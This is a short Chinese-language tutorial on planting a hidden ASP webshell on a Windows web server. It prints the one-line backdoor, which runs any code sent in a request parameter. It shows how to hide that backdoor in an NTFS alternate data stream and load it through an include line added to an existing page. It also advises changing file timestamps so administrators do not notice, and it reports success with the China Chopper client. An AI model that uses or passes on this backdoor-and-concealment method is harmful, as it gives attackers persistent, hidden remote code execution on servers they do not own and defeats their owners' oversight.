这是利用NTFS流隐藏你的一句话小马，这方法，文件写入后，不容易给发现，隐藏性好！

如下是ASP脚本的例子！

NTFS流文件的内容如下

<%

re= request("test")

if re <>"" then

execute re

response.end '表示结束，不再处理别的代码

end if

%>

把内容写入如下位置(示例位置)

H:Web动易Inc:1.jpg

看清楚，是:1.jpg不是1.jpg

文件写入后，H:Web动易Inc目录里是看不到文件的！

现在要引导这个一句话文件！格式:<!--#include file="目录:1.jpg"-->

我随便选一个文件(最好不要自己新建文件，别人容易发现有新文件)

H:Web动易Announce.asp

添加

<!--#include file="inc:1.jpg"-->

修改后保存！

一句话木马隐藏基本完成！当然 H:Web动易Announce.asp 你可以改个一下修改的时间，

这样别人就不容易发现有问题！

还有说一下，2003的流，是可以写入文件也可以写入目录的！你想把一句话马写在目录里也成，文件里也成

但建议保存到目录里，因为文件如果修改，流数据将会清空，但目录不会！

用菜刀测试成功！